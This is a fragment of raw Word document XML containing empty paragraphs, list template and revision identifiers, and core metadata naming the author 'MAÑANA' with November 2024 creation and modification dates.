    <w:p w14:paraId="6980DA56" w14:textId="77777777" w:rsidR="00A909A8" w:rsidRDefault="00A909A8" w:rsidP="008A7103"/>
    <w:p w14:paraId="2B6871BE" w14:textId="77777777" w:rsidR="00EB25F6" w:rsidRDefault="00EB25F6" w:rsidP="008A7103"/>
    <w:p w14:paraId="1A098342" w14:textId="77777777" w:rsidR="00EB5FA2" w:rsidRDefault="00EB5FA2" w:rsidP="008A7103"/>
    <w:sectPr w:rsidR="00EB5FA2" w:rsidSect="00002764">
      <w:pgSz w:w="12474" w:h="1871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3FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64F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30910"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB1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43E32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74E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A39D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F01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129DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C30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E3181"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF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D211B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="831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2E"/>
    <w:rsid w:val="00002764"/>
    <w:rsid w:val="0002556D"/>
    <w:rsid w:val="000B6ACA"/>
    <w:rsid w:val="000F0FE5"/>
    <w:rsid w:val="000F271F"/>
    <w:rsid w:val="001054F1"/>
    <w:rsid w:val="001C1612"/>
    <w:rsid w:val="001D5294"/>
    <w:rsid w:val="00220A17"/>
    <w:rsid w:val="00352D62"/>
    <w:rsid w:val="0048177B"/>
    <w:rsid w:val="00516364"/>
    <w:rsid w:val="00542D37"/>
    <w:rsid w:val="00676176"/>
    <w:rsid w:val="00731DEF"/>
    <w:rsid w:val="00792A69"/>
    <w:rsid w:val="007A5289"/>
    <w:rsid w:val="008247A7"/>
    <w:rsid w:val="008576BC"/>
    <w:rsid w:val="008A7103"/>
    <w:rsid w:val="008F0E05"/>
    <w:rsid w:val="009158B6"/>
    <w:rsid w:val="0092486B"/>
    <w:rsid w:val="00A027F6"/>
    <w:rsid w:val="00A909A8"/>
    <w:rsid w:val="00AD1726"/>
    <w:rsid w:val="00BC4CD3"/>
    <w:rsid w:val="00C0069F"/>
    <w:rsid w:val="00C66982"/>
    <w:rsid w:val="00C93F12"/>
    <w:rsid w:val="00CD34D9"/>
    <w:rsid w:val="00CF5E2C"/>
    <w:rsid w:val="00D46298"/>
    <w:rsid w:val="00D46679"/>
    <w:rsid w:val="00E4655D"/>
    <w:rsid w:val="00E809C0"/>
    <w:rsid w:val="00EB25F6"/>
    <w:rsid w:val="00EB5FA2"/>
    <w:rsid w:val="00F0292E"/>
    <w:rsid w:val="00F8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5002"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F744CEFC-4225-4010-A32A-B1E2FE79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D34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C6698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02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5288-81DE-4517-B727-D30BD19B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6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ÑANA</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MAÑANA</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-13T15:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-25T16:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>